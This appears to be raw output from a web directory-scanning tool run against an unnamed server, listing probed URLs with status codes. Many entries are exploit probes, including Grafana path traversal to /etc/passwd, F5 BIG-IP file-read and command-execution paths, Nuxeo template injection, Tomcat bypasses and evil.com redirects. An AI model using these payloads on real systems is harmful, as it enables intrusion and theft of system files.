/+CSCOE+/logon.html  [33m (Status: 400)[0m [Size: 1134]
/+CSCOT+/oem         [33m (Status: 400)[0m [Size: 1134]
/+CSCOT+/translation [33m (Status: 400)[0m [Size: 1134]
/..;/examples/jsp/index.html[33m (Status: 400)[0m [Size: 1134]
/..;/examples/websocket/index.xhtml[33m (Status: 400)[0m [Size: 1134]
/..;/examples/servlets/index.html[33m (Status: 400)[0m [Size: 1134]
/..;/manager/html    [33m (Status: 400)[0m [Size: 1134]
/.DS_Store           [32m (Status: 200)[0m [Size: 6148]
/.htpasswd           [33m (Status: 403)[0m [Size: 1025]
/.htaccess           [33m (Status: 403)[0m [Size: 1025]
//evil.com/..;/css   [33m (Status: 400)[0m [Size: 1134]
/?view=log           [32m (Status: 200)[0m [Size: 85958]
/?wsdl               [32m (Status: 200)[0m [Size: 85958]
/admin;/             [33m (Status: 400)[0m [Size: 1134]
/Admin;/             [33m (Status: 400)[0m [Size: 1134]
/application/configs/application.ini[33m (Status: 403)[0m [Size: 1025]
/application/logs/access.log[33m (Status: 403)[0m [Size: 1025]
/application/logs/application.log[33m (Status: 403)[0m [Size: 1025]
/application/logs/default.log[33m (Status: 403)[0m [Size: 1025]
/favicon.ico         [32m (Status: 200)[0m [Size: 1150]
/info.php            [32m (Status: 200)[0m [Size: 82822]
/index.php?redirect=//evil.com[32m (Status: 200)[0m [Size: 85958]
/index.php           [32m (Status: 200)[0m [Size: 85958]
/index.php?redirect=/\/evil.com/[32m (Status: 200)[0m [Size: 85958]
/jkstatus;           [33m (Status: 400)[0m [Size: 1134]
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml[33m (Status: 400)[0m [Size: 1134]
/phpmyadmin/         [32m (Status: 200)[0m [Size: 148769]
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/dashboard/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/debug/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/grafana/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/icon/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/mysql/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/prometheus/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/testdata/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/timeseries/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/welcome/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/public/plugins/zipkin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd[33m (Status: 400)[0m [Size: 154]
/robots.txt          [32m (Status: 200)[0m [Size: 0]
/robots.txt..;/      [33m (Status: 400)[0m [Size: 1134]
/secure/ConfigurePortalPages!default.jspa?view=popular[33m (Status: 400)[0m [Size: 1134]
/secure/ContactAdministrators!default.jspa[33m (Status: 400)[0m [Size: 1134]
/secure/QueryComponent!Default.jspa[33m (Status: 400)[0m [Size: 1134]
/service             [32m (Status: 200)[0m [Size: 1439]
/service/rest/swagger.json[32m (Status: 200)[0m [Size: 1439]
/service?Wsdl        [32m (Status: 200)[0m [Size: 1439]
/static..;/          [33m (Status: 400)[0m [Size: 1134]
/static/../../../a/../../../../etc/passwd[33m (Status: 400)[0m [Size: 154]
/static/..;/         [33m (Status: 400)[0m [Size: 1134]
/system              [33m (Status: 403)[0m [Size: 1025]
/test.php            [32m (Status: 200)[0m [Size: 19]
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license[33m (Status: 400)[0m [Size: 1134]
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5[33m (Status: 400)[0m [Size: 1134]
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd[33m (Status: 400)[0m [Size: 1134]
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdd[33m (Status: 400)[0m [Size: 1134]
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin[33m (Status: 400)[0m [Size: 1134]
/uploads/            [32m (Status: 200)[0m [Size: 131]
